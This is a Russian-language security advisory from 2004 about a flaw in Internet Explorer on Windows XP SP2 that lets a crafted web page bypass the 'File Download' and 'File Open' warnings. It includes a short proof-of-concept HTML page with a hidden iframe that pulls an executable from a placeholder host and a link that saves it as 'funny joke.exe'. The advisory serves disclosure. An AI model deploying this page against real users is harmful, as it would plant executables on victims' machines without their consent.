Обход ограничений в Microsoft IE на Windows XP SP2

Дата публикации:
22.11.2004
Всего просмотров:
2052
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Microsoft Internet Explorer (IE) на Windows XP SP2

Описание:
Уязвимость обнаружена в Microsoft Internet Explorer на Windows XP SP2. Удаленный атакующий может загрузить на уязвимую систему произвольный файл.

Удаленный атакующий может с помощью специально сформированной web страницы обойти ограничения безопасности для 'File Download' и 'File Open' и загрузить произвольный файл на уязвимую систему. Уязвимость реализуется посредством ответа сервера на запрос сообщением HTTP 404 error и вызова метода execCommand. Пример:

<html>
< body>
< iframe src='http://your.domain.com/v.exe?.htm' name=
"NotFound" width="0" height="0"></iframe>
Click <a href=# onclick="javascript:document.frames.NotFound.
document.execCommand('SaveAs',1,'funny joke.exe');">here</a>.
< /body>
< /html>

URL производителя: www. microsoft.com

Решение: решение на данный момент не существует

Ссылки: Microsoft IE Custom 404 Error Message and execCommand SaveAs Lets Remote Users Bypass XP SP2 Download Warning Mechanisms

или введите имя

CAPTCHA